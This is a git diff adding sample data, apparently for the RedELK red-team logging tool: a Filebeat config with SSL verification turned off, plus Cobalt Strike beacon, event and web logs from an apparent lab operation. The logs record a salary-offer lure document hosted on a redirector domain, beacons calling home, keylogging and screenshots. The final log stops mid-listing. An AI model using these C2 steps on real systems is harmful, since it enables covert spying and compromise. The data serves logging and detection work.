diff --git a/elkserver/mounts/sample-data/filebeat.yml b/elkserver/mounts/sample-data/filebeat.yml new file mode 100644 index 00000000..cf1eda27 --- /dev/null +++ b/elkserver/mounts/sample-data/filebeat.yml @@ -0,0 +1,179 @@ +filebeat.inputs: + +# BEGIN REDIRECTORS CONFIG +- type: log + enabled: true + fields_under_root: true + paths: + - /var/log/sample-data/haproxy.log + fields: + infra: + log: + type: redirtraffic + redir: + program: haproxy +- type: log + enabled: true + fields_under_root: true + paths: + - /var/log/sample-data/apache2.log + fields: + infra: + log: + type: redirtraffic + redir: + program: apache +- type: log + enabled: true + fields_under_root: true + paths: + - /var/log/sample-data/nginx.log + fields: + infra: + log: + type: redirtraffic + redir: + program: nginx +# END REDIRECTORS CONFIG + +# BEGIN COBALT STRIKE CONFIG +- type: log + scan_frequency: 5s + enabled: true + fields_under_root: true + paths: + - /var/log/sample-data/cobaltstrike/logs/*/events.log + fields: + infra: + log: + type: rtops + c2: + program: cobaltstrike + log: + type: events + +- type: log + scan_frequency: 5s + enabled: true + fields_under_root: true + paths: + - /var/log/sample-data/cobaltstrike/logs/*/weblog.log + fields: + infra: + log: + type: rtops + c2: + program: cobaltstrike + log: + type: weblog + +- type: log + scan_frequency: 5s + enabled: true + fields_under_root: true + paths: + - /var/log/sample-data/cobaltstrike/logs/*/downloads.log + fields: + infra: + log: + type: rtops + c2: + program: cobaltstrike + log: + type: downloads + +- type: log + scan_frequency: 5s + enabled: true + fields_under_root: true + paths: + - /var/log/sample-data/cobaltstrike/data/export_credentials.tsv + fields: + infra: + log: + type: rtops + c2: + program: cobaltstrike + log: + type: credentials + +- type: log + scan_frequency: 5s + enabled: true + fields_under_root: true + paths: + - /var/log/sample-data/cobaltstrike/logs/*/*/beacon_*.log + - /var/log/sample-data/cobaltstrike/logs/*/*/ssh_*.log + # Since Cobalt Strike version 3.14 the time format in the logs is changed. Here we use regex 'or' function (expr1)|(expr2) to match new or old format + multiline.pattern: '(^\d\d\/\d\d\s\d\d\:\d\d\:\d\d\sUTC\s\[)|(^\d\d\/\d\d\s\d\d\:\d\d\:\d\d\s\[)' # match "06/19 12:32:56 UTC [" or "06/19 12:32:56 [" + multiline.negate: true + multiline.match: after + multiline.max_lines: 100000 + fields: + infra: + log: + type: rtops + c2: + program: cobaltstrike + log: + type: beacon + +- type: log + scan_frequency: 5s + enabled: true + fields_under_root: true + paths: + - /var/log/sample-data/cobaltstrike/logs/*/*/keystrokes/keystrokes_*.txt + # Since Cobalt Strike version 3.14 the time format in the logs is changed. Here we use regex 'or' function (expr1)|(expr2) to match new or old format + multiline.pattern: '(^\d\d\/\d\d\s\d\d\:\d\d\:\d\d\sUTC\s\[)|(^\d\d\/\d\d\s\d\d\:\d\d\:\d\d\s\[)' # match "06/19 12:32:56 UTC [" or "06/19 12:32:56 [" + multiline.negate: true + multiline.match: after + multiline.max_lines: 100000 + fields: + infra: + log: + type: rtops + c2: + program: cobaltstrike + log: + type: keystrokes + +- type: log + scan_frequency: 5s + enabled: true + fields_under_root: true + paths: + - /var/log/sample-data/cobaltstrike/logs/*/*/screenshots.log + # Since Cobalt Strike version 3.14 the time format in the logs is changed. Here we use regex 'or' function (expr1)|(expr2) to match new or old format + multiline.pattern: '(^\d\d\/\d\d\s\d\d\:\d\d\:\d\d\sUTC\s\[)|(^\d\d\/\d\d\s\d\d\:\d\d\:\d\d\s\[)' # match "06/19 12:32:56 UTC [" or "06/19 12:32:56 [" + multiline.negate: true + multiline.match: after + multiline.max_lines: 100000 + fields: + infra: + log: + type: rtops + c2: + program: cobaltstrike + log: + type: screenshots + +# END COBALT STRIKE CONFIG + +filebeat.config.modules: + path: ${path.config}/modules.d/*.yml + reload.enabled: false + +setup.template.settings: + index.number_of_shards: 3 + +name: "sample-client" +fields_under_root: true +fields: + infra: + attack_scenario: sample-scenario + +output.logstash: + hosts: ["redelk-logstash:5044"] + ssl.certificate_authorities: ["/usr/share/filebeat/redelkCA.crt"] + ssl.verification_mode: none diff --git a/elkserver/mounts/sample-data/logs/apache2.log b/elkserver/mounts/sample-data/logs/apache2.log new file mode 100644 index 00000000..e69de29b diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/beacon_1233239984.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/beacon_1233239984.log new file mode 100644 index 00000000..e5dfeb7e --- /dev/null +++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/beacon_1233239984.log @@ -0,0 +1,53 @@ +03/29 15:18:46 UTC [metadata] 13.80.254.1 <- 10.99.1.4; computer: LabMaster; user: outflank *; process: testbeacon.exe; pid: 2004; os: Windows; version: 6.2; beacon arch: x64 (x64) +03/29 15:19:00 UTC [input] upload +03/29 15:19:15 UTC [input] pwd +03/29 15:19:15 UTC [task] <> Tasked beacon to print working directory +03/29 15:19:19 UTC [checkin] host called home, sent: 8 bytes +03/29 15:19:20 UTC [output] +Current directory is C:\Users\outflank\Desktop + +03/29 15:19:39 UTC [input] cd \windows\temp +03/29 15:19:39 UTC [task] <> cd \windows\temp +03/29 15:19:39 UTC [checkin] host called home, sent: 21 bytes +03/29 15:19:40 UTC [input] pwd +03/29 15:19:40 UTC [task] <> Tasked beacon to print working directory +03/29 15:19:43 UTC [checkin] host called home, sent: 8 bytes +03/29 15:19:43 UTC [output] +Current directory is C:\windows\temp + +03/29 15:19:49 UTC [input] upload +03/29 15:19:56 UTC [task] <> Tasked beacon to upload C:\Users\outflank\Desktop\OfferNr2020F6592_salary.doc as OfferNr2020F6592_salary.doc +03/29 15:19:56 UTC [indicator] file: f06d1ae4cbde03cde3898f05b841850f 150016 bytes OfferNr2020F6592_salary.doc +03/29 15:19:58 UTC [checkin] host called home, sent: 150055 bytes +03/29 15:20:21 UTC [input] ls +03/29 15:20:21 UTC [task] <> Tasked beacon to list files in . +03/29 15:20:21 UTC [checkin] host called home, sent: 19 bytes +03/29 15:20:21 UTC [output] +C:\windows\temp\* +D 0 03/29/2020 15:20:01 . +D 0 03/29/2020 15:20:01 .. +D 0 03/29/2020 11:18:45 C4663637-44E3-43AA-9240-B6235C0B5998-Sigs +F 33311 03/29/2020 09:50:19 chrome_installer.log +D 0 03/29/2020 09:37:54 Crashpad +F 0 03/29/2020 09:27:39 DMI6A08.tmp +D 0 03/29/2020 09:43:18 hsperfdata_LabMaster$ +F 0 03/29/2020 11:24:19 LabMaster-20200329-1124.log +F 8670 03/29/2020 11:25:55 LabMaster-20200329-1125.log +F 14480 03/29/2020 11:25:59 LabMaster-20200329-1125a.log +F 11410 03/29/2020 11:25:59 LabMaster-20200329-1125b.log +F 32790 03/29/2020 11:26:29 LabMaster-20200329-1126.log +F 10400 03/29/2020 11:18:45 MpCmdRun.log +F 18736 03/29/2020 11:18:45 MpSigStub.log +F 150016 03/29/2020 15:19:58 OfferNr2020F6592_salary.doc +F 0 03/29/2020 11:24:19 officeclicktorun.exe_streamserver(202003291124191078).log +F 102 03/29/2020 09:17:42 silconfig.log +D 0 03/29/2020 09:18:28 winrmdone +D 0 03/29/2020 09:18:24 winrmrunning + + +03/29 15:29:24 UTC [input] exit +03/29 15:29:24 UTC [task] <> Tasked beacon to exit +03/29 15:29:28 UTC [checkin] host called home, sent: 8 bytes +03/29 15:29:28 UTC [output] +beacon exit. + diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/beacon_2019412980.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/beacon_2019412980.log new file mode 100644 index 00000000..796b411b --- /dev/null +++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/beacon_2019412980.log @@ -0,0 +1,95 @@ +03/29 14:54:56 UTC [metadata] 13.80.254.1 <- 10.99.1.4; computer: LabMaster; user: outflank *; process: rundll32.exe; pid: 3568; os: Windows; version: 10.0; beacon arch: x86 (x64) +03/29 15:00:18 UTC [input] ps +03/29 15:00:18 UTC [task] Tasked beacon to list processes +03/29 15:00:22 UTC [checkin] host called home, sent: 12 bytes +03/29 15:00:22 UTC [output] +[System Process] 0 0 +System 0 4 x64 0 +smss.exe 4 304 x64 NT AUTHORITY\SYSTEM 0 +csrss.exe 416 428 +wininit.exe 416 492 x64 NT AUTHORITY\SYSTEM 0 +csrss.exe 484 500 +winlogon.exe 484 552 x64 NT AUTHORITY\SYSTEM 1 +services.exe 492 620 x64 NT AUTHORITY\SYSTEM 0 +lsass.exe 492 628 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 620 720 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 620 764 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 620 876 x64 NT AUTHORITY\SYSTEM 0 +dwm.exe 552 908 +svchost.exe 620 956 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 620 1008 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 620 1408 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 620 1416 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 620 1560 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 620 1700 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 620 1840 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 620 2016 x64 NT AUTHORITY\LOCAL SERVICE 0 +VSSVC.exe 620 2024 x64 NT AUTHORITY\SYSTEM 0 +spoolsv.exe 620 1168 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 620 1360 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 620 1960 x64 NT AUTHORITY\SYSTEM 0 +MsMpEng.exe 620 1988 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 620 2436 x64 NT AUTHORITY\NETWORK SERVICE 0 +WaAppAgent.exe 620 3244 x64 NT AUTHORITY\SYSTEM 0 +LogonUI.exe 552 3412 x64 NT AUTHORITY\SYSTEM 1 +rundll32.exe 876 3656 x64 NT AUTHORITY\SYSTEM 0 +rundll32.exe 876 3772 x64 NT AUTHORITY\SYSTEM 0 +WindowsAzureTelemetryService.exe 620 3980 x64 NT AUTHORITY\SYSTEM 0 +WindowsAzureGuestAgent.exe 620 2384 x64 NT AUTHORITY\SYSTEM 0 +WaSecAgentProv.exe 3244 688 x64 NT AUTHORITY\SYSTEM 0 +conhost.exe 688 3900 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 620 1504 x64 NT AUTHORITY\NETWORK SERVICE 0 +msdtc.exe 620 2236 x64 NT AUTHORITY\NETWORK SERVICE 0 +WindowsAzureNetAgent.exe 620 3896 x64 NT AUTHORITY\SYSTEM 0 +VFPlugin.exe 3896 2932 x64 NT AUTHORITY\SYSTEM 0 +conhost.exe 2932 3576 x64 NT AUTHORITY\SYSTEM 0 +csrss.exe 440 1312 +winlogon.exe 440 2980 x64 NT AUTHORITY\SYSTEM 2 +dwm.exe 2980 1288 +rdpclip.exe 2436 2920 x64 LabMaster\outflank 2 +RuntimeBroker.exe 720 808 x64 LabMaster\outflank 2 +sihost.exe 876 2368 x64 LabMaster\outflank 2 +explorer.exe 2136 3636 x64 LabMaster\outflank 2 +svchost.exe 620 2632 x64 LabMaster\outflank 2 +taskhostw.exe 876 3368 x64 LabMaster\outflank 2 +ShellExperienceHost.exe 720 4664 x64 LabMaster\outflank 2 +SearchUI.exe 720 4760 x64 LabMaster\outflank 2 +powershell.exe 808 3084 x64 LabMaster\outflank 2 +conhost.exe 3084 4844 x64 LabMaster\outflank 2 +svchost.exe 620 3812 x64 NT AUTHORITY\LOCAL SERVICE 0 +taskhostw.exe 876 5548 x64 LabMaster\outflank 2 +OfficeClickToRun.exe 620 4216 x64 NT AUTHORITY\SYSTEM 0 +fontdrvhost.exe 2980 4908 +AppVShNotify.exe 4216 2172 x64 LabMaster\outflank 2 +mstsc.exe 3636 2196 x64 LabMaster\outflank 2 +mstsc.exe 3636 4900 x64 LabMaster\outflank 2 +javaw.exe 3272 3832 x64 LabMaster\outflank 2 +testbeacon.exe 3636 3324 x64 LabMaster\outflank 2 +testbeacon-longhaul.exe 3636 5792 x64 LabMaster\outflank 2 +notepad.exe 3636 4804 x64 LabMaster\outflank 2 +chrome.exe 808 1060 x64 LabMaster\outflank 2 +chrome.exe 1060 2888 x64 LabMaster\outflank 2 +chrome.exe 1060 4640 x64 LabMaster\outflank 2 +chrome.exe 1060 4240 x64 LabMaster\outflank 2 +chrome.exe 1060 5788 x64 LabMaster\outflank 2 +chrome.exe 1060 4052 x64 LabMaster\outflank 2 +WmiPrvSE.exe 720 5300 +chrome.exe 1060 5380 x64 LabMaster\outflank 2 +chrome.exe 1060 2508 x64 LabMaster\outflank 2 +WINWORD.EXE 5648 5096 x86 LabMaster\outflank 2 +rundll32.exe 5096 3568 x86 LabMaster\outflank 2 +WmiPrvSE.exe 720 2868 + + +03/29 15:00:35 UTC [input] screenshot +03/29 15:00:35 UTC [task] Tasked beacon to take screenshot +03/29 15:00:36 UTC [checkin] host called home, sent: 162370 bytes +03/29 15:00:37 UTC [output] +received screenshot (253367 bytes) + +03/29 15:01:00 UTC [input] exit +03/29 15:01:00 UTC [task] <> Tasked beacon to exit +03/29 15:01:01 UTC [checkin] host called home, sent: 8 bytes +03/29 15:01:01 UTC [output] +beacon exit. + diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/beacon_496538698.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/beacon_496538698.log new file mode 100644 index 00000000..70cfcd58 --- /dev/null +++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/beacon_496538698.log @@ -0,0 +1,34 @@ +03/29 13:16:36 UTC [metadata] 13.80.254.1 <- 10.99.1.4; computer: LabMaster; user: outflank *; process: testbeacon.exe; pid: 3324; os: Windows; version: 6.2; beacon arch: x64 (x64) +03/29 13:26:57 UTC [input] screenshot +03/29 13:26:57 UTC [task] Tasked beacon to take screenshot +03/29 13:27:01 UTC [checkin] host called home, sent: 197186 bytes +03/29 13:27:02 UTC [output] +received screenshot (166469 bytes) + +03/29 13:54:31 UTC [input] keylogger +03/29 13:54:31 UTC [task] Tasked beacon to log keystrokes +03/29 13:54:35 UTC [checkin] host called home, sent: 81474 bytes +03/29 13:55:09 UTC [output] +received keystrokes + +03/29 13:55:18 UTC [output] +received keystrokes + +03/29 13:55:34 UTC [input] jobkill +03/29 13:55:34 UTC [error] jobkill error: not enough arguments +03/29 13:55:36 UTC [input] jobs +03/29 13:55:36 UTC [task] <> Tasked beacon to list jobs +03/29 13:55:37 UTC [checkin] host called home, sent: 8 bytes +03/29 13:55:37 UTC [output] +1 0 keystroke logger + + +03/29 13:55:42 UTC [input] jobkill 1 +03/29 13:55:42 UTC [task] <> Tasked beacon to kill job 1 +03/29 13:55:42 UTC [checkin] host called home, sent: 10 bytes +03/29 15:01:06 UTC [input] exit +03/29 15:01:06 UTC [task] <> Tasked beacon to exit +03/29 15:01:08 UTC [checkin] host called home, sent: 8 bytes +03/29 15:01:08 UTC [output] +beacon exit. + diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/keystrokes/keystrokes_496538698.txt b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/keystrokes/keystrokes_496538698.txt new file mode 100644 index 00000000..afeebbfb --- /dev/null +++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/keystrokes/keystrokes_496538698.txt @@ -0,0 +1,23 @@ +03/29 13:55:09 UTC Received keystrokes + + + +CCobalt Strike +E======= +r2[command] + +CRun +E======= +notepad + +C +E======= + + + +CUntitled - Notepad +E======= +test for keylogger +03/29 13:55:18 UTC Received keystrokes + + - hello :-) diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/screenshots/screen_012702_496538698.jpg b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/screenshots/screen_012702_496538698.jpg new file mode 100644 index 00000000..9c65cd7a Binary files /dev/null and b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/screenshots/screen_012702_496538698.jpg differ diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/screenshots/screen_030037_2019412980.jpg b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/screenshots/screen_030037_2019412980.jpg new file mode 100644 index 00000000..200c496c Binary files /dev/null and b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/screenshots/screen_030037_2019412980.jpg differ diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/events.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/events.log new file mode 100644 index 00000000..0bbac085 --- /dev/null +++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/events.log @@ -0,0 +1,14 @@ +03/29 12:29:29 UTC *** MarcS joined +03/29 13:16:31 UTC *** initial beacon from outflank *@10.99.1.4 (LabMaster) +03/29 13:54:14 UTC *** neo joined +03/29 14:13:46 UTC *** neo quit +03/29 14:37:25 UTC *** neo joined +03/29 14:48:36 UTC *** MarcS hosted file /root/cobaltstrike/uploads/OfferNr2020F6592_salary.doc @ http://redira1.totallynotavirus.nl:80/downloaddoc.php?f=56893 +03/29 14:54:21 UTC *** MarcS hosted file /root/cobaltstrike/uploads/OfferNr2020F6592_salary.doc @ http://redira1.totallynotavirus.nl:80/download/doc56893 +03/29 14:54:49 UTC *** initial beacon from outflank *@10.99.1.4 (LabMaster) +03/29 15:12:10 UTC *** MarcS quit +03/29 15:12:28 UTC *** neo quit +03/29 15:12:49 UTC *** neo joined +03/29 15:14:07 UTC *** MarcS joined +03/29 15:18:37 UTC *** initial beacon from outflank *@10.99.1.4 (LabMaster) +03/29 16:04:01 UTC *** MarcS quit diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/weblog_80.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/weblog_80.log new file mode 100644 index 00000000..44167146 --- /dev/null +++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/weblog_80.log @@ -0,0 +1,34 @@ +13.80.254.1 unknown unknown [03/29 13:16:30 UTC] "GET /JEWw/" 200 260679 "beacon beacon stager x64" "Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko" +171.67.70.85 unknown unknown [03/29 13:21:27 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +94.183.49.72 unknown unknown [03/29 13:33:11 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" +110.249.212.46 unknown unknown [03/29 14:36:06 UTC] "GET http://110.249.212.46/testget" 404 0 "" "null" +110.249.212.46 unknown unknown [03/29 14:36:06 UTC] "GET http://110.249.212.46/testget" 404 0 "" "null" +13.80.254.1 unknown unknown [03/29 14:49:03 UTC] "GET /downloaddoc.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" +13.80.254.1 unknown unknown [03/29 14:49:59 UTC] "GET /downloaddoc.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" +13.80.254.1 unknown unknown [03/29 14:50:22 UTC] "GET /downloaddoc.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" +13.80.254.1 unknown unknown [03/29 14:54:32 UTC] "GET /download/doc56893" 200 150016 "page Serves /root/cobaltstrike/uploads/OfferNr2020F6592_salary.doc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" +13.80.254.1 unknown unknown [03/29 14:54:49 UTC] "GET /zcF9/" 200 208983 "beacon beacon stager x86" "Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko" +169.197.108.38 unknown unknown [03/29 15:18:08 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" +13.80.254.1 unknown unknown [03/29 15:18:37 UTC] "GET /JEWw/" 200 260679 "beacon beacon stager x64" "Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko" +10.1.3.10 unknown unknown [03/29 15:33:48 UTC] "GET /download/doc56893" 200 150016 "page Serves /root/cobaltstrike/uploads/OfferNr2020F6592_salary.doc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" +37.235.156.98 unknown unknown [03/29 15:48:49 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" +173.48.25.25 unknown unknown [03/29 17:31:01 UTC] "GET /" 404 0 "" "null" +213.136.69.132 unknown unknown [03/29 17:41:17 UTC] "GET /TP/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +213.136.69.132 unknown unknown [03/29 17:41:17 UTC] "GET /TP/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +213.136.69.132 unknown unknown [03/29 17:41:17 UTC] "GET /thinkphp/html/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +213.136.69.132 unknown unknown [03/29 17:41:17 UTC] "GET /html/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +213.136.69.132 unknown unknown [03/29 17:41:17 UTC] "GET /public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +213.136.69.132 unknown unknown [03/29 17:41:17 UTC] "GET /TP/html/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +213.136.69.132 unknown unknown [03/29 17:41:17 UTC] "GET /elrekt.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +213.136.69.132 unknown unknown [03/29 17:41:17 UTC] "GET /index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +213.136.69.132 unknown unknown [03/29 17:41:17 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +178.73.215.171 unknown unknown [03/29 18:24:30 UTC] "GET /" 404 0 "" "null" +192.241.237.107 unknown unknown [03/29 18:52:52 UTC] "GET /hudson" 404 0 "" "Mozilla/5.0 zgrab/0.x" +171.67.70.85 unknown unknown [03/29 18:59:56 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +208.91.109.90 unknown unknown [03/29 19:20:47 UTC] "HEAD /robots.txt" 404 0 "" "null" +94.140.114.53 unknown unknown [03/29 19:26:19 UTC] "GET /" 404 0 "" "Pandalytics/1.0 (https://domainsbot.com/pandalytics/)" +110.77.180.234 unknown unknown [03/29 20:39:29 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +176.104.243.33 unknown unknown [03/29 20:46:39 UTC] "GET /" 404 0 "" "null" +41.57.104.224 unknown unknown [03/29 22:30:54 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" +177.45.130.136 unknown unknown [03/29 22:56:03 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" +5.196.65.217 unknown unknown [03/29 22:58:35 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.2.10/beacon_455228.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.2.10/beacon_455228.log new file mode 100644 index 00000000..ed972380 --- /dev/null +++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.2.10/beacon_455228.log @@ -0,0 +1,4 @@ +03/30 09:10:57 UTC [metadata] beacon_22170412 -> 10.1.2.10; computer: S-WIN21; user: ADMIN-W.Trommel *; process: wsmprovhost.exe; pid: 2476; os: Windows; version: 6.3; beacon arch: x64 (x64) +03/30 09:10:51 UTC [output] +established link to parent beacon: 10.1.4.10 + diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/beacon_358093816.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/beacon_358093816.log new file mode 100644 index 00000000..3e4f1574 --- /dev/null +++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/beacon_358093816.log @@ -0,0 +1,2357 @@ +03/30 08:41:27 UTC [metadata] 13.81.175.116 <- 10.1.3.10; computer: L-WIN223; user: w.tax; process: mousedrivercontrol.exe; pid: 5192; os: Windows; version: 6.2; beacon arch: x64 (x64) +03/30 08:42:36 UTC [input] ps +03/30 08:42:36 UTC [task] Tasked beacon to list processes +03/30 08:42:39 UTC [checkin] host called home, sent: 12 bytes +03/30 08:42:39 UTC [output] +[System Process] 0 0 +System 0 4 +Registry 4 88 +smss.exe 4 404 +csrss.exe 504 512 +wininit.exe 504 588 +csrss.exe 580 596 +winlogon.exe 580 684 +services.exe 588 700 +lsass.exe 588 732 +svchost.exe 700 832 +fontdrvhost.exe 588 844 +fontdrvhost.exe 684 856 +svchost.exe 700 920 +svchost.exe 700 972 +svchost.exe 700 1016 +LogonUI.exe 684 600 +dwm.exe 684 652 +svchost.exe 700 1032 +svchost.exe 700 1040 +svchost.exe 700 1096 +svchost.exe 700 1104 +svchost.exe 700 1144 +svchost.exe 700 1176 +svchost.exe 700 1236 +svchost.exe 700 1264 +svchost.exe 700 1300 +svchost.exe 700 1364 +svchost.exe 700 1400 +svchost.exe 700 1444 +svchost.exe 700 1452 +svchost.exe 700 1572 +svchost.exe 700 1588 +svchost.exe 700 1620 +svchost.exe 700 1712 +svchost.exe 700 1768 +svchost.exe 700 1792 +svchost.exe 700 1824 +svchost.exe 700 1840 +svchost.exe 700 1880 +svchost.exe 700 1944 +svchost.exe 700 1972 +svchost.exe 700 1980 +svchost.exe 700 2000 +svchost.exe 700 2028 +VSSVC.exe 700 2152 +Memory Compression 4 2204 +svchost.exe 700 2224 +svchost.exe 700 2252 +svchost.exe 700 2300 +svchost.exe 700 2352 +svchost.exe 700 2388 +svchost.exe 700 2496 +svchost.exe 700 2524 +svchost.exe 700 2604 +svchost.exe 700 2612 +svchost.exe 700 2712 +svchost.exe 700 2764 +svchost.exe 700 2816 +svchost.exe 700 2828 +svchost.exe 700 2912 +spoolsv.exe 700 2972 +svchost.exe 700 3024 +OfficeClickToRun.exe 700 3084 +svchost.exe 700 3184 +svchost.exe 700 3192 +svchost.exe 700 3200 +svchost.exe 700 3216 +WaAppAgent.exe 700 3264 +sysmon64.exe 700 3280 +svchost.exe 700 3292 +svchost.exe 700 3316 +MsMpEng.exe 700 3324 +WindowsAzureGuestAgent.exe 700 3336 +WindowsAzureNetAgent.exe 700 3368 +WindowsAzureTelemetryService.exe 700 3428 +svchost.exe 700 3492 +svchost.exe 700 3552 +svchost.exe 700 3688 +VFPlugin.exe 3368 3812 +conhost.exe 3812 3856 +unsecapp.exe 920 1744 +WmiPrvSE.exe 920 3236 +svchost.exe 700 4304 +svchost.exe 700 4352 +svchost.exe 700 4616 +svchost.exe 700 4648 +WmiPrvSE.exe 920 4680 +NisSrv.exe 700 4836 +svchost.exe 700 4884 +svchost.exe 700 4912 +taskhostw.exe 1144 2124 +svchost.exe 700 4016 +svchost.exe 700 5240 +svchost.exe 700 5284 +csrss.exe 5752 5760 +winlogon.exe 5752 5804 +fontdrvhost.exe 5804 5892 +dwm.exe 5804 5940 +svchost.exe 700 6128 +rdpclip.exe 1040 5588 x64 STROOP\w.tax 2 +sihost.exe 1444 808 x64 STROOP\w.tax 2 +svchost.exe 700 5556 x64 STROOP\w.tax 2 +svchost.exe 700 4084 x64 STROOP\w.tax 2 +taskhostw.exe 1144 5008 x64 STROOP\w.tax 2 +svchost.exe 700 5116 +svchost.exe 700 6292 +ctfmon.exe 6292 6348 x64 STROOP\w.tax 2 +svchost.exe 700 6408 +explorer.exe 6420 6500 x64 STROOP\w.tax 2 +svchost.exe 700 6748 x64 STROOP\w.tax 2 +ShellExperienceHost.exe 920 6960 x64 STROOP\w.tax 2 +SearchUI.exe 920 7076 x64 